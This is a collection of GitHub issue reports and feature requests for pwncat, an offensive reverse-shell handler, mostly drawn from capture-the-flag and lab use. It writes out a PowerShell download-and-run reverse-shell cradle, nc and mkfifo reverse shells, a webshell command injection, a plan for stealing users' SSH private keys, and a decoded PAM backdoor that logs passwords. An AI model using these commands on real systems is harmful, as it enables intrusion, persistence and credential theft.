On some machines, /bin/sh is a symlink to bash, and others, it might be a symlink to dash... or not a symlink at all! pwncat should have smart support to determine what shell is really invoked, because sh is the safest option... but it could use a different shell altogether!

Describe the bug
I was trying to use pwncat for the connection to the Alfred box on try hack me and when running the PowerShell reverse TCP connection it was not connecting. it would just stall out.

Describe the target system
Alfred on tryhackme is using a windows server as the backbone. A netcat session connects but when using pwncat it will never connect.

To Reproduce
Steps to reproduce the behavior:

For the alfred box

1. There are two ports with web servers on them
   2.1. Port 80 which just contains a RIP for Bruce Wane
   2.2. Port 8080 is a login for jenkins
2. Check for default login values.
   Test username:Password as admin:admin
   • This worked to grant us access.
3. From the main menu select project in the center > Select configure this allow you to modify the code to be run on the underlining system.

   powershell iex (New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.x.x.x -Port 1337

4. Run a python3 -m http.server and nc -nlvp 1337 before building the project.
5. A user shell is now avaible.

If the following pwncat command is used the connection stalls out and never connects. pwncat -l -p 1337

Expected behavior
I would have exected a shell to connect.

Screenshots

Was testing this against a HTB easy box (Lame) and got the following output trying to catch a nc reverse shell

[04:55:17] received connection from 10.10.10.3:53108                                                                                         connect.py:149
[04:55:19] new host w/ hash 565efa37913bccb7e9628e12d28427ca                                                                                  victim.py:328
initializing: database ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╺━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 28.6%
                                                                                                                                                           
Traceback (most recent call last):
  File "/usr/local/bin/sadcat", line 11, in <module>
    load_entry_point('pwncat==0.1', 'console_scripts', 'pwncat')()
  File "/usr/local/lib/python3.8/dist-packages/pwncat-0.1-py3.8.egg/pwncat/__main__.py", line 28, in main
    pwncat.victim.command_parser.dispatch_line(
  File "/usr/local/lib/python3.8/dist-packages/pwncat-0.1-py3.8.egg/pwncat/commands/__init__.py", line 291, in dispatch_line
    command.run(args)
  File "/usr/local/lib/python3.8/dist-packages/pwncat-0.1-py3.8.egg/pwncat/commands/connect.py", line 152, in run
    pwncat.victim.connect(client)
  File "/usr/local/lib/python3.8/dist-packages/pwncat-0.1-py3.8.egg/pwncat/remote/victim.py", line 332, in connect
    self.probe_host_details(progress, task_id)
  File "/usr/local/lib/python3.8/dist-packages/pwncat-0.1-py3.8.egg/pwncat/remote/victim.py", line 582, in probe_host_details
    if "systemd" in init:
TypeError: argument of type 'NoneType' is not iterable

Very reproducable, get a shell on HTB Lame (10.10.10.3) and spawn a nc reverse shell and catch it to cause this error. If you dont have HTB premium I'd be happy to help with any testing you need! (Il try to fix the code too, il update this if I find a fix)

UPDATE :
Fixed it. Solution code below :) Hope this helped! (I doubt my solution is ideal, im not mainly a programmer)

Solution:
Line 583 in victim.py

        try:
            if "systemd" in init:
                self.host.init = util.Init.SYSTEMD
            elif "upstart" in init:
                self.host.init = util.Init.UPSTART
            elif "sysv" in init:
                self.host.init = util.Init.SYSV
            else:
                self.host.init = util.Init.UNKNOWN
        except:
            print('Some errors occured')

Describe the bug
After putting Pwncat in listening mode and receiving connection, it stays on the step Synchronizing prompt,
I tried doing a reverse shell manually and nothing goes wrong

Describe the target system
Target system : Debian

To Reproduce
Steps to reproduce the behavior:

1. execute pwncat -l --port 444
2. Launch the reverse shell code
3. wait for pwncat to start
4. Stuck at this step

Expected behavior
Supposed to be executed normally I guess, it's the first time I am using pwncat

Screenshots

There is currently an escalation method not attempted by pwncat that should be implemented soon. Currently, pwncat is able to recognize if it has a file read/write pair and attempt escalation to a different user by reading/writing authorized_keys and/or private keys of that user and then sshing to localhost.

There is a separate case where file-read as root is possible, but escalation to root directly is not. In this case, pwncat should attempt to read the private keys of all users in order to escalate to those users if possible. Further, it should leverage root file-read capabilities when adding authorized_keys in order to refrain as much as possible from clobbering a user's authorized_keys file (e.g. when a user has only a file-write capability but no file-read, we currently have to overwrite the authorized_keys, with permission from the user).

As an example, assume pwncat is currently operating as UserA. UserA has read-only access to the filesystem as root. UserB is able to run commands via sudo as root. Seemingly, with only file-read, we cannot escalate without cracking UserB or root's password hashes. Instead, we may be able to leak UserB's private key and authorized_keys files, and utilize a SSH with localhost to gain access as UserB. This would then allow us to gain access as root.

Describe the bug
error connect via ssh, pwncat -s -H <IP> -u user --password "passwd"

Describe the target system
Linux parrot 5.7.0-2parrot2-amd64 SMP Sebian 5.7.10-1parrot2 (2020-07-31)

Screenshots

@CodeXTF2 mentioned adding some new commands over at #21. I think continuing the discussion on top of that issue isn't a good idea, so I figured I'd create a new one. If you just want to discuss for now for your own fiddling, that's fine, but also I'd welcome some fresh ideas that may be able to be merged into master at some point 👍

The module-based commands are implemented in two different pieces. In general, there's a back-end API, which does the real work. This is normally implemented as a package with a "main" class that is added to the Victim object. That way any part of pwncat can interact with it programmatically if needed (think privesc utilizing enumeration modules). Then, a command is created (usually with the same name) for interacting with it. So, there's a privesc python module that has a Finder class. An instance of that class is available as pwncat.victim.privesc. And there's a privesc command under the pwncat.commands package which simply provides a UI to the privesc module.

Practically speaking, you can implement it however you want. I like the back-end/front-end separation because it allows different parts of pwncat to seamlessly work together. For example, the privesc modules can request enumeration information from the pwncat.victim.enumerate, and utilize pwncat.victim.persist to fix some partial privesc situations automatically. All that happens seamlessly without having to hard-code specific methods or account for edge cases all over the place because of the abstractions.

You can take a look at the way the persistence and privesc packages are implemented to get an idea. They utilize pkgutils to dynamically load python modules/classes. The base classes are created and added to the Victim class in victim.py.

You mention a couple examples. Spawning another shell I would imagine would go under "persistence" anyway. I had planned to add some bind/reverse shell persistence methods eventually, but hadn't gotten to it. The log stuff could go under it's own module. I feel like it may be able to be integrated into tamper somehow because it feels logically connected there.

I had tried not to go down the road of a generic "run" command with all the modules underneath it (like Meterpreter used to use) because I think that gets unwieldy quickly with a bunch of modules underneath one interface. Grouping things into related base commands makes sense in my head, and allows them to be represented by objects in Python which makes automation easier. However, I'm open to discussion about a different structure. It's not set in stone.

Is your feature request related to a problem? Please describe.
The prompt is broken in zsh

Describe the solution you'd like
Make the prompt look similar to what bash does.

Describe alternatives you've considered
Manually setting the prompt and just using bash.

Additional context
this seems to do it in both bash and zsh:

export PS1='$(echo -n '"'"' \033[01;31m(remote)\033[00m \033[01;33m'"$(whoami)@$(hostname)"'\033[00m:\033[01;36m'"${PWD/$HOME/~}"'\033[00m$ '"'"')'

Still doesn't work in dash though.

From OPSEC point of view, it would be useful to have:

1. A verbose message about the tamper / persistence i.e. changes made to the system, before we disconnect / exit the shell(s), for example:

WARNING: Following actions on Host 1.2.3.4 have not been reverted:
  1 - Modified /home/george/.ssh/authorized_keys
  2 - Persistence: passwd as system (local)

2. Logging all pwncat activities by default - shell connects, local / remote commands, pwncat commands, enum/privesc/tamper attempt et all.

I recently was playing around with using pwncat on the TryHackMe.com "Blog" room (https://tryhackme.com/room/blog).

After getting a connection up via a reverse shell (pwncat -l -p 1234), everything works (but has the command prompt issue mentioned) but once I switch to the local prompt (Ctrl+d), then back to the remote prompt (Ctrl+d) I'm unable to type any commands. Basically it seems like the key presses are not being echoed to the remote system.

I'm running this on Kali 2020.2, /bin/bash - All fully updated as the time of writing.
Python 3.8.3

Also, after connecting to remote, backspace echos a "^D" when key presses are still echoed. It seems like there may be something getting interpreted incorrectly with the terminal config?

Figured I would drop a ticket! Thanks.

If you are pasting terminal output or code snippets, place them in a code block (three backticks) in accordance with Markdown formatting for easier reading

Describe the bug
thr reverse shell does not spwan a prompt

Describe the target system
its a HTB machineits on BUFF.
the IP: 10.10.10.198

To Reproduce
Steps to reproduce the behavior:

1. open reverse shell on machine with :
   10.10.10.198:8080/upload/kamehameha.php?telepathy=nc -e cmd.exe 10.10.14.242 9999
2. start pwncat with:
   pwncat -l -p 9999
3. hangs on step initilazing hostname

Expected behavior
Shell pops

Describe the bug
Error while running app

Describe the target system
CentOS 8, 64-bit x86
Python 3.6.8

To Reproduce
Steps to reproduce the behavior:

1. clone (I added --depth=1 but I doubt that would cause this)
2. cd pwncat
3. python -m venv env
4. source env/bin/activate
5. python setup.py install (no errors or warnings produced)
6. ./pwncat --help

Expected behavior
It should produce the help output

** Output of error **

Traceback (most recent call last):
  File "/opt/red/pwncat/env/bin/pwncat", line 11, in <module>
    load_entry_point('pwncat==0.3.1', 'console_scripts', 'pwncat')()
  File "/opt/red/pwncat/env/lib64/python3.6/site-packages/pwncat-0.3.1-py3.6.egg/pwncat/__main__.py", line 29, in main
    shlex.join(["connect"] + sys.argv[1:]), prog_name="pwncat"
AttributeError: module 'shlex' has no attribute 'join

Default installation of CentOS 7, removing the pam module gives an insufficient permission error even though I am using a root shell.

(remote) root@localhost:/# 
[01:23:13] local terminal restored   
...    
(local) pwncat$ persist -r -m pam                                                                                                                   
[!] insufficient permissions

You may interested to know an existing similar tool: Freedom Fighting Mode (FFM) that the author calls a "hacking harness".
It can allocates pty, remove history, allow download/upload, normalize etc.
It's also in python so it may inspire you for new features.

Describe the bug
If you are connected to a "Victim" and enter some commands, pressing the arrow keys "up" or "down" does not immediately show the last entered command. If you then hit enter the last command gets executed as normal and gets displayed.
Similar behaviour applies to the arrow keys "left" and "right" - if you enter a command and hit the left arrow key to correct e.g. a typo, the cursor stays at the same place. If you then enter e.g. a space, the cursor get's updated and the space is inserted at the new position. This makes editing files especially hard.

The error does only appear in "remote" mode, it works fine in "local" mode.
Also tried with different reverse shell methods (python, perl, php, bash, nc) - behaviour is the same.

Using other prompt styles and/or syncing the terminal does not solve the problem either.

Describe the target system
Tested on multiple Systems, different targets and different attacker machines
Kali Linux in the newest Version
Ubuntu Linux 20.04 LTS newest Version
Tested with different Terminal Programs and also with PuTTY (SSH)
Appears both in a python-venv and in a normal installation
Using Python 3.8.5

To Reproduce
Steps to reproduce the behavior:
UP/DOWN

1. Connect to a victim
2. Insert a Command
3. Hit the "UP" arrow key to get to the last command
4. The command is not displayed
5. Hit enter, the command gets executed and is shown

LEFT/RIGHT

1. Connect to a victim
2. Type a command
3. Try to correct a typo (by pressing the left or right arrow keys)
4. The cursor does not get updated immediatly
5. At the next keystroke the cursor will get updated eventually

Expected behavior
Arrow Keys should be reflected immediately

Screencaptured the error for visual explanation
pwncat_arrowkeys.zip

Describe the bug
OpenBSD has slightly different command switches. This breaks initial enumeration process, and shell does not get established.

Describe the target system
OpenBSD 6.6 GENERIC#353 amd64

To Reproduce
Netcat on OpenBSD does not support -e. So, I tested the following alternate ways:

On Kali - set up the listener:
(pwncat-env) root@kali:/opt/pwncat# pwncat --listen --port 4444

On OpenBSD terminal:

Case 1:

$ mkfifo f
$ /bin/sh 0<f | nc <kali-ip> 4444 | tee f

Case 2:

# mknod /tmp/backpipe p                                                                                               
# /bin/sh 0</tmp/backpipe | nc <kali-ip> 4444 1>/tmp/backpipe 

This initiates the connection, however the following initial, pre-shell set up commands fail:

<sanitized>
hostname: unknown option -- f
usage: hostname [-s] [name-of-host]
which: ip: Command not found.
which: python: Command not found.
which: python2: Command not found.
which: python3: Command not found.
which: python2.7: Command not found.
which: python3.6: Command not found.
which: python3.8: Command not found.
which: python3.9: Command not found.
script: unknown option -- -
usage: script [-a] [-c command] [file]
script:  exec script -q /dev/null /bin/sh
unknown option -- q
usage: script [-a] [-c command] [file] 

On Kali, we see the following:

(pwncat-env) root@kali:/opt/pwncat# pwncat --listen --port 4444
[19:49:13] received connection from <openbsd-ip>:23900 connect.py:148
[19:49:15] warning: no mac address; host hash only based on hostname  victim.py:311
           new host w/ hash 6adf97f83acf6553d5a6a5b1070f3755  victim.py:329
[19:49:19] pwncat running in /bin/sh  victim.py:363

At this point, the prompt synchronization gets stuck after reaching 85.XX%.

Breaking it results in the following traceback:

Traceback (most recent call last):
  File "/opt/pwncat/pwncat-env/bin/pwncat", line 11, in <module>
    load_entry_point('pwncat==0.3.1', 'console_scripts', 'pwncat')()
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/__main__.py", line 28, in main
    pwncat.victim.command_parser.dispatch_line(
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/commands/__init__.py", line 290, in dispatch_line
    command.run(args)
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/commands/connect.py", line 151, in run
    pwncat.victim.connect(client)
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/remote/victim.py", line 401, in connect
    self.run("unset PROMPT_COMMAND")
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/remote/victim.py", line 1035, in run
    sdelim, edelim = self.process(cmd, delim=wait, timeout=timeout)
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/remote/victim.py", line 1085, in process
    x = self.recvuntil(b"\n", timeout=timeout)
  File "/opt/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/remote/victim.py", line 1928, in recvuntil
    data = self.client.recv(1)
KeyboardInterrupt

Expected behavior

1. OpenBSD command syntax is checked & handled.
2. Local & remote prompt should get synchronized.

I've crossed this issue, I believe simply adding a try catch would fix it.

I tried installing with python as in from the readme.txt but I encountered an error, however, with python3 it installed successfully

Describe the bug
For some reason, python does not always install the paramiko fork referenced in setup.py. This causes people to have an argument error when connecting via SSH. To mitigate this, I've added a runtime check with inspect as a mitigation until the problem is fixed. The mitigation will tell the user how to fix the problem (which is one simple pip command).

If you have an older version of pwncat and run an ssh connection without the correct paramiko version you will get a message like this:

TypeError: recv() takes 2 positional arguments but 3 were given

To Reproduce
Steps to reproduce the behavior:

1. Attempt to connect to a target with SSH.

Expected behavior
A successful connection.

Is your feature request related to a problem? Please describe.
pwncat takes a long time to start. Most of this time is loading dependencies and creating a Victim.
Describe the solution you'd like
Implement a daemonize feature to allow for pwncat to run in the background and connect to it via a much dumber (and therefore faster) socket implementation (eg. the other pwncat or ncat, or a custom-made one especially for this purpose)

With all the repos and specific python library this should be in a docker container to increase portability.

On my notebook i had to add requeststo the requirements.txt to get rid of the following error:

Traceback (most recent call last):
  File "/usr/lib/python3.8/runpy.py", line 193, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/lib/python3.8/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/home/xx/src/pwncat/pwncat/__main__.py", line 8, in <module>
    from pwncat.pty import PtyHandler
  File "/home/xx/src/pwncat/pwncat/pty.py", line 20, in <module>
    import requests
ModuleNotFoundError: No module named 'requests'

Namely /home/arrexel on the Bashed HTB machine. This seems to destroy the connection.

Describe the bug
Connection is stuck at initializing hostname

Describe the target system
Seen on Hack The Box - Blunder. Reverse shell attempt as www-data.

uname -a
Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

To Reproduce
Steps to reproduce the behavior:

1. Exploit the vuln service to get a (limited) php meterpreter shell.
2. Start pwncat listener - pwncat --listen -p 4444
3. From Meterpreter shell - nc <pwncat-IP> 4444 -vv
4. Connect back received by pwcat listener but doesn't proceed.

(pwncat-env) root@kali:/opt/pwncat# pwncat --listen -p 4444
[17:20:39] received connection from 10.10.10.191:39416                         connect.py:148
initializing: hostname ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 0.0%                                                                                                                               

When Ctrl+C to pwncat, we see the following at netcat listener end:
echo; echo yiStaQRJdm; which hostname; echo t5xI8sBGX8

No issues seen when executing these commands independently on a new shell.

yiStaQRJdm
/usr/bin/hostname
t5xI8sBGX8

Expected behavior
The new host should get registered, and pwncat would enable further communications with the target.

Traceback (most recent call last):

File "/root/Snufkin/tools/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/commands/init.py", line 215, in run
212 if line == "":
213 continue
214
❱ 215 self.dispatch_line(line)
216 # We used to catch only KeyboardException, but this prevents a
217 # badly written command from completely killing our remote
218 # connection.
File "/root/Snufkin/tools/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/commands/init.py", line 290, in dispatch_line
287 args = line
288
289 # Run the command
❱ 290 command.run(args)
291
292 if prog_name:
293 command.parser.prog = prog_name
File "/root/Snufkin/tools/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/commands/enumerate.py", line 187, in run
184 return
185
186 if args.action == "show":
❱ 187 self.show_facts(args.type, args.provider, args.long)
188 elif args.action == "flush":
189 self.flush_facts(args.type, args.provider)
190 elif args.action == "report":
File "/root/Snufkin/tools/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/commands/enumerate.py", line 423, in show_facts
420 ) as progress:
421 task = progress.add_task("", status="initializing")
422 for typ in types:
❱ 423 for fact in pwncat.victim.enumerate.iter(
424 typ, filter=lambda f: provider is None or f.source == provider
425 ):
426 progress.update(task, status=str(fact.data))
File "/root/Snufkin/tools/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/enumerate/init.py", line 118, in iter
115 if self.exist(enumerator.provides, dummy_name):
116 continue
117
❱ 118 for data in enumerator.enumerate():
119 try:
120 fact = self.add_fact(
121 name, data, enumerator.name, exist_ok=False
File "/root/Snufkin/tools/pwncat/pwncat-env/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/enumerate/passwords.py", line 73, in enumerate
70 if len(line) < 3:
71 continue
72 path = line[0]
❱ 73 lineno = int(line[1])
74 content = ":".join(line[2:])
75
76 password = None

ValueError: invalid literal for int() with base 10: ''

Disclaimer: I had to remove some details, because this is machine from the PWK lab. I did root this machine by hand before.

• Getting shell works.
• Short enum works and working kernel exploit is shown

While doing privesc -l or privesc -e the script seems to read the my.cnf (Possible password at /etc/my.cnf:7) and hangs there for more than 15min. I did kill the process after that time.

[16:22 kali@kali <redacted>] > sudo pwncat --listen -p 443
[sudo] Passwort für kali: 
[16:22:27] received connection from <redacted>:32775                                                                                                                                                                                                              \connect.py\:148
[16:22:28] new host w/ hash 3c64ff49ec20b71350183c04f412066d                                                                                                                                                                                                      \victim.py\:329
[16:22:32] pwncat running in /bin/sh                                                                                                                                                                                                                              \victim.py\:363
[16:22:37] pwncat is ready 🐈                                                                                                                                                                                                                                     \victim.py\:762
                                                                                                                                                                                                                                                                               

(remote) apache@<redacted>:/$ 
[16:22:59] local terminal restored                                                                                                                                                                                                                                \victim.py\:784
(local) pwncat$ enum --show --quick                                                                                                                                                                                                                                            
SYSTEM.HOSTNAME Facts by pwncat.enumerate.system
  <redacted>
SYSTEM.ARCH Facts by pwncat.enumerate.system
  Running on a [36mi686[39m processor
SYSTEM.KERNEL.VERSION Facts by pwncat.enumerate.system
  Running Linux Kernel [31m2[39m.[32m6[39m.[34m9[39m-[36m89.EL[39m
SYSTEM.KERNEL.EXPLOIT Facts by pwncat.enumerate.kernel-exploit
  [31mkrad[39m
  [31mkrad3[39m
  [31mpy2[39m
  [31mexp.sh[39m
  [31msock_sendpage2[39m ([36mCVE-2009-2692[39m)
  [31msock_sendpage[39m ([36mCVE-2009-2692[39m)
  [31mudp_sendmsg_32bit[39m ([36mCVE-2009-2698[39m)
  [31mhalf_nelson1[39m ([36mCVE-2010-3848[39m)
  [31mhalf_nelson2[39m ([36mCVE-2010-3850[39m)
  [31mhalf_nelson3[39m ([36mCVE-2010-4073[39m)
  [31mamerican-sign-language[39m ([36mCVE-2010-4347[39m)
  [31mpktcdvd[39m ([36mCVE-2010-3437[39m)
  [31mvideo4linux[39m ([36mCVE-2010-3081[39m)
SYSTEM.NETWORK.HOSTS Facts by pwncat.enumerate.system
  [39m
SYSTEM.NETWORK Facts by pwncat.enumerate.system
  Interface [36mlo[39m w/ address [34m127.0.0.1/8[39m
  Interface [36mlo[39m w/ address [34m::1/128[39m
  Interface [36meth0[39m w/ address [34m<redacted>/16[39m
  Interface [36meth0[39m w/ address [34mfe80::250:56ff:fe9f:b8d4/64[39m
(local) pwncat$ privesc -e                                                                                                                                                                                                                                                     
['[1] 4634']
^CTraceback (most recent call last):
╭─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ File "/usr/local/lib/python3.8/dist-packages/pwncat/enumerate/passwords.py", line 65, in enumerate                                                                                                                                                                          │
│     62                                                                                                                                                                                                                                                                      │
│     63     command = f"{grep} -InriE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null"                                                                                                                                                                  │
│     64     with pwncat.victim.subprocess(command, "r") as filp:                                                                                                                                                                                                             │
│  ❱  65         for line in filp:                                                                                                                                                                                                                                            │
│     66             line = line.decode("utf-8").strip().split(":")                                                                                                                                                                                                           │
│     67             if len(line) < 3:                                                                                                                                                                                                                                        │
│     68                 print(line)                                                                                                                                                                                                                                          │
│ File "/usr/local/lib/python3.8/dist-packages/pwncat/file.py", line 84, in readinto                                                                                                                                                                                          │
│     81         if getattr(pwncat.victim.client, "recv_into", None) is not None:                                                                                                                                                                                             │
│     82             while True:                                                                                                                                                                                                                                              │
│     83                 try:                                                                                                                                                                                                                                                 │
│  ❱  84                     n = pwncat.victim.client.recv_into(b)                                                                                                                                                                                                            │
│     85                     break                                                                                                                                                                                                                                            │
│     86                 except (BlockingIOError, socket.error):                                                                                                                                                                                                              │
│     87                     pass                                                                                                                                                                                                                                             │
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

Hi, first I want to say thx for sharing this amazing tool with the community.

Describe the bug
I'm trying to get a reverse on jack machine on Try Hack Me platform. The prolem is that when i bound pwncat to any port and send reverse from target it's stuck at 85.7%

Describe the target system
Jack from HackTheBox

Linux jack 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

To Reproduce
Steps to reproduce the behavior:
send from jack user a shell to pwncat listener

Expected behavior
Getting a pwncat shell

Screenshots

Best Regards,

Pierre

Issue Description
I am trying to get a reverse connection from a box. My current setup of pwncat is in a virtualenv in my OSX Catalina 10.15.6 on Python 3.8.5

After receiving the connection, two main issues:

1. The prompt is weird.
2. Anytime I run a command with spaces ( ex. ls -la ) the connection breaks with the error message reported below.

Target System
THM box "dogcat" ( I am sure you know about this box @JohnHammond )

Error Log

\[\033[01;31m\](remote)\[\033[00m\] \[\033[01;33m\]\u@\h\[\033[00m\]:\[\033[01;36m\]\w\[\033[00m\]$
[01:50:40] local terminal restored                                                                                                                                                                __main__.py:74
Traceback (most recent call last):
  File "/Users/testuser/Documents/CTF/pwncat/venv/bin/pwncat", line 33, in <module>
    sys.exit(load_entry_point('pwncat==0.3.1', 'console_scripts', 'pwncat')())
  File "/Users/testuser/Documents/CTF/pwncat/venv/lib/python3.8/site-packages/pwncat-0.3.1-py3.8.egg/pwncat/__main__.py", line 60, in main
    sys.stdout.flush()
BlockingIOError: [Errno 35] write could not complete without blocking

Screenshots

ASCII Cinema Recording

The regular expression for for sudoers enumeration will be unable to privesc -e as it will include any spaces if they exist.

Output of sudo -l:

User bob may run the following commands on ubuntu:                                                                                                                                                                                         
    (root : root) NOPASSWD: /usr/bin/file

pwncat showing the space is captured.

(local) pwncat$ privesc -l                                                                                                                                                                                                                    
 - shell as root  via /usr/bin/zip (sudo NOPASSWD)

If there are two or more options for a user to sudo, pwncat will parse the entire line rather than each command separately.

(remote) bob@ubuntu:~$ sudo -l
Matching Defaults entries for user on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp,
        /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script

pwncat fact on sudo enumeration:

(local) pwncat$ enum -s -t sudo                            
SUDO Facts by sudo 
  User [34muser[39m: [33m/bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp,[39m as
[31mroot[39m on [35mlocal[39m ([32mNOPASSWD[39m)

I did persist -i -m pam and it seems to have been installed, but when I log in with any user with the backdoor password it doesnt let me in. Am I doing something wrong? Also, even when running as root removing the persistence with tamper gives me an insufficient permission error. Sorry if I did something wrong, but I followed the commands as in the documentation.

UPDATE:
issue is caused by SELinux. Needs to be set to permissive to work.
Can be easily fixed by adding an os.system command in the pam.py script to set SELinux to permissive. Could trigger alerts so not an ideal solution, but it works.
pam logs:

Jun 28 18:06:18 localhost sshd[12335]: PAM adding faulty module: /usr/lib64/security/pam_succeed.so
Jun 28 18:06:20 localhost sshd[12335]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
Jun 28 18:15:46 localhost sshd[16556]: PAM unable to dlopen(/usr/lib64/security/pam_succeed.so): /usr/lib64/security/pam_succeed.so: failed to map segment from shared object: Permission denied
Jun 28 18:15:46 localhost sshd[16556]: PAM adding faulty module: /usr/lib64/security/pam_succeed.so
Jun 28 18:15:48 localhost sshd[16556]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"

A fully encrypted session should be possible while "Living of the Land." I believe that openssl, if available can be used to stream data. If so, we can utilize this and other commonly accessible binaries (e.g. mkfifo) to create a bash session which fully encrypts the communication across the socket. Some work would need to be done with the base socket operations in PtyHandler, but I believe this is technically possible.

Disclaimer: I didn't try to run the code, but I did some reading about PAM and the error (if it's one) seems to be about coding logic.

If you decode the base64 in your pam.py, the following sticks out (sorry if the syntax highlight-ing doesn't work):

	if( memcmp(SHA1(password, strlen(password), NULL), key, 20) != 0 ){
		filp = fopen("__PWNCAT_LOG__", "a");
		if( filp != NULL )
		{
			fprintf(filp, "%s:%s\n", username, password);
			fclose(filp);
		}
		return PAM_IGNORE;
	}
    //return success
    return PAM_SUCCESS;

If I understand this part correctly, the function returns PAM_IGNORE after a successful write operation, but thus never reaches the PAM_SUCCESS return code which, if I understand that correctly, is needed to successfully authenticate a user with a successful password. As it is, I understand that the following PAM Modules are evaluated after that which may result in a wrong authentication with the backdoor-pw.

python setup.py install

Running typepy-1.1.1/setup.py -q bdist_egg --dist-dir /tmp/easy_install-KMLDok/typepy-1.1.1/egg-dist-tmp-8JyWz3 Traceback (most recent call last): File "setup.py", line 65, in <module> dependency_links=dependency_links, File "/usr/lib/python2.7/dist-packages/setuptools/__init__.py", line 145, in setup return distutils.core.setup(**attrs) File "/usr/lib/python2.7/distutils/core.py", line 151, in setup dist.run_commands() File "/usr/lib/python2.7/distutils/dist.py", line 953, in run_commands self.run_command(cmd) File "/usr/lib/python2.7/distutils/dist.py", line 972, in run_command cmd_obj.run() File "/usr/lib/python2.7/dist-packages/setuptools/command/install.py", line 67, in run self.do_egg_install() File "/usr/lib/python2.7/dist-packages/setuptools/command/install.py", line 117, in do_egg_install cmd.run(show_deprecation=False) File "/usr/lib/python2.7/dist-packages/setuptools/command/easy_install.py", line 449, in run self.easy_install(spec, not self.no_deps) File "/usr/lib/python2.7/dist-packages/setuptools/command/easy_install.py", line 691, in easy_install return self.install_item(None, spec, tmpdir, deps, True) File "/usr/lib/python2.7/dist-packages/setuptools/command/easy_install.py", line 738, in install_item self.process_distribution(spec, dist, deps) File "/usr/lib/python2.7/dist-packages/setuptools/command/easy_install.py", line 783, in process_distribution [requirement], self.local_index, self.easy_install File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 782, in resolve replace_conflicting=replace_conflicting File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 1065, in best_match return self.obtain(req, installer) File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 1077, in obtain return installer(requirement) File "/usr/lib/python2.7/dist-packages/setuptools/command/easy_install.py", line 710, in easy_install return self.install_item(spec, dist.location, tmpdir, deps) File "/usr/lib/python2.7/dist-packages/setuptools/command/easy_install.py", line 736, in install_item dists = self.install_eggs(spec, download, tmpdir) File "/usr/lib/python2.7/dist-packages/setuptools/command/easy_install.py", line 921, in install_eggs return self.build_and_install(setup_script, setup_base) File "/usr/lib/python2.7/dist-packages/setuptools/command/easy_install.py", line 1189, in build_and_install self.run_setup(setup_script, setup_base, args) File "/usr/lib/python2.7/dist-packages/setuptools/command/easy_install.py", line 1175, in run_setup run_setup(setup_script, args) File "/usr/lib/python2.7/dist-packages/setuptools/sandbox.py", line 253, in run_setup raise File "/usr/lib/python2.7/contextlib.py", line 35, in __exit__ self.gen.throw(type, value, traceback) File "/usr/lib/python2.7/dist-packages/setuptools/sandbox.py", line 195, in setup_context yield File "/usr/lib/python2.7/contextlib.py", line 35, in __exit__ self.gen.throw(type, value, traceback) File "/usr/lib/python2.7/dist-packages/setuptools/sandbox.py", line 166, in save_modules saved_exc.resume() File "/usr/lib/python2.7/dist-packages/setuptools/sandbox.py", line 141, in resume 